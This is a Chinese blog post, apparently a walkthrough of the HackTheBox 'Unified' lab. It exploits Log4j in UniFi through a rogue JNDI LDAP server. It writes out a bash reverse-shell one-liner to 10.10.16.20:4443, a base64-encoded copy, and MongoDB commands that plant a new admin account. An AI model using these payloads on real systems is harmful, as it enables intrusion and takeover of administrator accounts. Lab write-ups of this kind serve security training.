Stack Ashes
Go back

hackthebox_unified解题

hackthebox_unified解题思路

前提条件

宿主机和目标机器需要在同一网段中

  1. kali中可以使用
openvpn unified.ovpn

连接到hackthebox的vpn

  1. windows 中可以使用openvpn.exe 下载连接 OPENVPN

    OPENVPN 加代理 速度快一点

    alt text

    在创建配置文件时 需要勾选代理

    alt text

题解

task 7 What port do we need to inspect intercepted traffic for?

alt text

常规思路代理抓包

remberme log4j??

本机IP

alt text

尝试让本机IP访问目标机器的ldap服务

request alt text

因为在windows 下进行攻击靶机此处使用 windump代替tcpdump

windump -D
windump -i 1

指定端口 alt text

alt text

存在log4j漏洞 alt text

通过编译ldap服务来利用该漏洞

git clone https://github.com/veracode-research/rogue-jndi

下载mvn.zip

alt text

理论上来说

bash -i >&/dev/tcp/10.10.16.20/4443 0>&1

bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjIwLzQ0NDMgMD4mMQ==}|{base64,-d}|{bash,-i}

https://ares-x.com/tools/runtime-exec

alt text

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjIwLzQ0NDMgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.20"

启动jar

alt text

注意看启动了tomcat服务 alt text

监听4443端口

alt text

buripsuie 重发

alt text

理论上会拿到shell

alt text

alt text

task 8 What port is the MongoDB service running on?

alt text

端口 27117

TASK 9 What is the default database name for UniFi applications?

ace

google it

TASK 10

What is the function we use to enumerate users within the database in MongoDB?

mongo --port 27117 ace

alt text

db.admin.find()

alt text

TASK 11

What is the function we use to update users within the database in MongoDB?

db.admin.insert()

TASK 12

What is the password for the root user?

db.admin.insert({ "email" : "pilgrim@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$s35.XAjj83yh2Ssr$NnS1Br9C1qhLxPSlxCJn9DH0q42DOqPJDx6fXTuA8fbfcTBfwRIT7eBRsyaCU13zlqwrtgNZGV7p4mpQ8yMOc/" })

alt text

alt text

db.site.find().forEach(printjson);

db.privilege.insert({ "admin_id" : "66a5d4f9e88a7f30f38ba2e8", "permissions" : [ ], "role" : "admin", "site_id" : "61ce269d46e0fb0012d47ec4" });

Submit user flag

alt text

alt text

Submit root flag

alt text

alt text

不知道为什么,OPENVPN 的UDP协议无法连接,只能使用TCP协议连接,速度慢一点,但是可以连接成功,不知道是不是因为网络问题,还是OPENVPN的问题, 有没有师傅知道的,请告诉我一下,谢谢!

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
LLM与0day安全
Next Post
buuoj-强网杯-2019